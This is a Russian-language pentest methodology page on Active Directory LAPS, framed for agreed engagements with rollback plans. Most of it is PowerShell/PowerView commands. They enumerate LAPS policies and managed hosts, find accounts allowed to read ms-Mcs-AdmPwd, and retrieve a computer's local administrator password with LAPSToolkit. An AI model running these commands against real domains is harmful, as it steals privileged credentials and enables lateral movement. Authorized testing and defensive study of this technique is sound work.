Перейти к основному содержимому

LAPS

:::tip Формат страницы

Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.

:::

Порядок действий

  1. Зафиксируйте роль в домене и допустимые техники (read‑only / согласованная эксплуатация).
  2. Соберите данные для картирования атаки (учётки, делегирование, доверия).
  3. Двигайтесь по сценариям раздела с планом отката и контролем DC.
  4. Команды и инструменты в блоках кода — на английском.

Методика

Перечисление и разведка

dir C:\Program Files\LAPS\CSE
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl
Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName

Эксплуатация

ls <GPCFileSysPath>\Machine\Registry.pol
Parse-PolFile .\Desktop\Registry.pol
# Obtain the SID
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier
# Convert the SID
ConvertFrom-SID <SecurityIdentifier>
. .\LAPSToolkit.ps1
Find-LAPSDelegatedGroups
Get-DomainComputer -Identity <HOSTNAME> -Properties ms-Mcs-AdmPwd